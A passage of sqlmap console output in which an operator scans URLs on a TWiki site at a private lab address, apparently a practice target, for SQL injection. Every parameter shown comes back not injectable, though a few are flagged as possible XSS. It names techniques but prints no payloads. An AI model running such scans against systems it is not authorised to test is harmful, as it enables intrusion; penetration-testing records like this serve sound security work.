[18:36:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:36:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:36:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:36:39] [INFO] testing 'Oracle AND time-based blind'
[18:36:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:36:40] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:37:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:37:27] [WARNING] URI parameter '#1*' is not injectable
[18:37:28] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 33:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WebSearch?t=1441456678
do you want to test this URL? [Y/n/q]
> Y
[18:37:28] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WebSearch?t=1441456678'
[18:37:28] [INFO] testing connection to the target URL
[18:37:28] [INFO] testing if the target URL is stable
[18:37:29] [INFO] target URL is stable
[18:37:29] [INFO] testing if GET parameter 't' is dynamic
[18:37:29] [WARNING] GET parameter 't' does not appear dynamic
[18:37:29] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[18:37:29] [INFO] testing for SQL injection on GET parameter 't'
[18:37:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:37:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:37:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:37:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:37:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:37:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:37:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:37:33] [INFO] testing 'MySQL inline queries'
[18:37:33] [INFO] testing 'PostgreSQL inline queries'
[18:37:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:37:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:37:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:37:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:37:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:37:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:37:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:37:36] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:37:37] [INFO] testing 'Oracle AND time-based blind'
[18:37:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:37:37] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:37:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:37:51] [WARNING] GET parameter 't' is not injectable
[18:37:51] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 34:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Web *Search[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[18:37:51] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Web *Search[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:37:51] [INFO] testing connection to the target URL
[18:37:51] [INFO] testing if the target URL is stable
[18:37:52] [INFO] target URL is stable
[18:37:52] [INFO] testing if URI parameter '#1*' is dynamic
[18:37:52] [INFO] confirming that URI parameter '#1*' is dynamic
[18:37:52] [INFO] URI parameter '#1*' is dynamic
[18:37:52] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:37:52] [INFO] testing for SQL injection on URI parameter '#1*'
[18:37:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:37:52] [WARNING] reflective value(s) found and filtering out
[18:37:54] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:37:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:37:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:37:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:37:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:37:56] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:37:56] [INFO] testing 'MySQL inline queries'
[18:37:56] [INFO] testing 'PostgreSQL inline queries'
[18:37:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:37:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:37:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:37:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:37:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:37:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:37:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:38:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:38:00] [INFO] testing 'Oracle AND time-based blind'
[18:38:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:38:01] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:38:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:38:12] [WARNING] URI parameter '#1*' is not injectable
[18:38:12] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 35:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?skin=print
do you want to test this URL? [Y/n/q]
> Y
[18:38:12] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?skin=print'
[18:38:12] [INFO] testing connection to the target URL
[18:38:12] [INFO] testing if the target URL is stable
[18:38:13] [INFO] target URL is stable
[18:38:13] [INFO] testing if GET parameter 'skin' is dynamic
[18:38:13] [INFO] confirming that GET parameter 'skin' is dynamic
[18:38:13] [INFO] GET parameter 'skin' is dynamic
[18:38:13] [INFO] heuristics detected web page charset 'ascii'
[18:38:13] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[18:38:13] [INFO] testing for SQL injection on GET parameter 'skin'
[18:38:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:38:13] [WARNING] reflective value(s) found and filtering out
[18:38:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:38:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:38:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:38:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:38:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:38:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:38:17] [INFO] testing 'MySQL inline queries'
[18:38:17] [INFO] testing 'PostgreSQL inline queries'
[18:38:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:38:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:38:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:38:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:38:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:38:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:38:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:38:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:38:21] [INFO] testing 'Oracle AND time-based blind'
[18:38:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:38:21] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:38:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:38:34] [WARNING] GET parameter 'skin' is not injectable
[18:38:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 36:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebSearch?rev1=1.13&rev2=1.12
do you want to test this URL? [Y/n/q]
> Y
[18:38:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebSearch?rev1=1.13&rev2=1.12'
[18:38:34] [INFO] testing connection to the target URL
[18:38:34] [INFO] testing if the target URL is stable
[18:38:35] [INFO] target URL is stable
[18:38:35] [INFO] testing if GET parameter 'rev1' is dynamic
[18:38:35] [WARNING] GET parameter 'rev1' does not appear dynamic
[18:38:35] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[18:38:35] [INFO] testing for SQL injection on GET parameter 'rev1'
[18:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:38:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:38:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:38:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:38:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:38:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:38:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:38:39] [INFO] testing 'MySQL inline queries'
[18:38:39] [INFO] testing 'PostgreSQL inline queries'
[18:38:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:38:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:38:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:38:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:38:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:38:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:38:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:38:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:38:42] [INFO] testing 'Oracle AND time-based blind'
[18:38:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:38:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:38:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:38:54] [WARNING] GET parameter 'rev1' is not injectable
[18:38:54] [INFO] testing if GET parameter 'rev2' is dynamic
[18:38:54] [WARNING] GET parameter 'rev2' does not appear dynamic
[18:38:54] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[18:38:54] [INFO] testing for SQL injection on GET parameter 'rev2'
[18:38:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:38:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:38:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:38:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:38:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:38:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:38:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:38:59] [INFO] testing 'MySQL inline queries'
[18:38:59] [INFO] testing 'PostgreSQL inline queries'
[18:38:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:39:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:39:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:39:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:39:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:39:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:39:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:39:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:39:03] [INFO] testing 'Oracle AND time-based blind'
[18:39:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:39:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:39:15] [WARNING] GET parameter 'rev2' is not injectable
[18:39:15] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 37:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?rev=1.12
do you want to test this URL? [Y/n/q]
> Y
[18:39:15] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?rev=1.12'
[18:39:15] [INFO] testing connection to the target URL
[18:39:16] [INFO] testing if the target URL is stable
[18:39:17] [INFO] target URL is stable
[18:39:17] [INFO] testing if GET parameter 'rev' is dynamic
[18:39:17] [WARNING] GET parameter 'rev' does not appear dynamic
[18:39:17] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:39:17] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[18:39:17] [INFO] testing for SQL injection on GET parameter 'rev'
[18:39:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:39:17] [WARNING] reflective value(s) found and filtering out
[18:39:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:39:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:39:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:39:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:39:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:39:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:39:21] [INFO] testing 'MySQL inline queries'
[18:39:21] [INFO] testing 'PostgreSQL inline queries'
[18:39:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:39:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:39:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:39:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:39:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:39:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:39:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:39:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:39:24] [INFO] testing 'Oracle AND time-based blind'
[18:39:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:39:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:39:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:39:38] [WARNING] GET parameter 'rev' is not injectable
[18:39:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:39:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebSearch?rev1=1.12&rev2=1.11'
[18:39:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?rev=1.11'
URL 38:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WebSearch?template=oopsmore&param1=1.13&param2=1.13
do you want to test this URL? [Y/n/q]
> Y
[18:39:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WebSearch?template=oopsmore&param1=1.13&param2=1.13'
[18:39:38] [INFO] testing connection to the target URL
[18:39:38] [INFO] testing if the target URL is stable
[18:39:39] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:39:39] [INFO] testing if GET parameter 'template' is dynamic
[18:39:39] [INFO] confirming that GET parameter 'template' is dynamic
[18:39:39] [INFO] GET parameter 'template' is dynamic
[18:39:39] [INFO] heuristics detected web page charset 'ascii'
[18:39:39] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[18:39:39] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[18:39:39] [INFO] testing for SQL injection on GET parameter 'template'
[18:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:39:39] [WARNING] reflective value(s) found and filtering out
[18:39:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:39:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:39:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:39:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:39:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:39:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:39:42] [INFO] testing 'MySQL inline queries'
[18:39:42] [INFO] testing 'PostgreSQL inline queries'
[18:39:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:39:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:39:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:39:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:39:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:39:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:39:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:39:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:39:45] [INFO] testing 'Oracle AND time-based blind'
[18:39:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:39:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:39:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:39:54] [WARNING] GET parameter 'template' is not injectable
[18:39:54] [INFO] testing if GET parameter 'param1' is dynamic
[18:39:55] [WARNING] GET parameter 'param1' does not appear dynamic
[18:39:55] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[18:39:55] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[18:39:55] [INFO] testing for SQL injection on GET parameter 'param1'
[18:39:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:39:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:39:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:39:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:39:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:39:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:39:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:39:59] [INFO] testing 'MySQL inline queries'
[18:39:59] [INFO] testing 'PostgreSQL inline queries'
[18:39:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:39:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:40:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:40:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:40:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:40:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:40:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:40:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:40:03] [INFO] testing 'Oracle AND time-based blind'
[18:40:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:40:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:40:18] [WARNING] GET parameter 'param1' is not injectable
[18:40:18] [INFO] testing if GET parameter 'param2' is dynamic
[18:40:18] [WARNING] GET parameter 'param2' does not appear dynamic
[18:40:19] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[18:40:19] [INFO] testing for SQL injection on GET parameter 'param2'
[18:40:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:40:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:40:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:40:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:40:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:40:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:40:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:40:23] [INFO] testing 'MySQL inline queries'
[18:40:23] [INFO] testing 'PostgreSQL inline queries'
[18:40:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:40:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:40:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:40:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:40:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:40:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:40:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:40:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:40:26] [INFO] testing 'Oracle AND time-based blind'
[18:40:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:40:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:40:37] [INFO] target URL appears to be UNION injectable with 1 columns
[18:40:37] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[18:40:42] [WARNING] GET parameter 'param2' is not injectable
[18:40:42] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 39:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiPreferences?t=1441456700
do you want to test this URL? [Y/n/q]
> Y
[18:40:42] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiPreferences?t=1441456700'
[18:40:42] [INFO] testing connection to the target URL
[18:40:42] [INFO] testing if the target URL is stable
[18:40:43] [INFO] target URL is stable
[18:40:43] [INFO] testing if GET parameter 't' is dynamic
[18:40:43] [WARNING] GET parameter 't' does not appear dynamic
[18:40:43] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[18:40:43] [INFO] testing for SQL injection on GET parameter 't'
[18:40:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:40:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:40:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:40:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:40:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:40:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:40:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:40:47] [INFO] testing 'MySQL inline queries'
[18:40:47] [INFO] testing 'PostgreSQL inline queries'
[18:40:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:40:47] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:40:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:40:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:40:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:40:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:40:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:40:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:40:51] [INFO] testing 'Oracle AND time-based blind'
[18:40:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:40:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:40:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:41:04] [WARNING] GET parameter 't' is not injectable
[18:41:04] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 40:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *Preferences[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[18:41:04] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *Preferences[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:41:04] [INFO] testing connection to the target URL
[18:41:04] [INFO] testing if the target URL is stable
[18:41:05] [INFO] target URL is stable
[18:41:05] [INFO] testing if URI parameter '#1*' is dynamic
[18:41:05] [WARNING] URI parameter '#1*' does not appear dynamic
[18:41:05] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:41:05] [INFO] testing for SQL injection on URI parameter '#1*'
[18:41:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:41:06] [WARNING] reflective value(s) found and filtering out
[18:41:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:41:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:41:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:41:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:41:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:41:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:41:09] [INFO] testing 'MySQL inline queries'
[18:41:09] [INFO] testing 'PostgreSQL inline queries'
[18:41:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:41:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:41:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
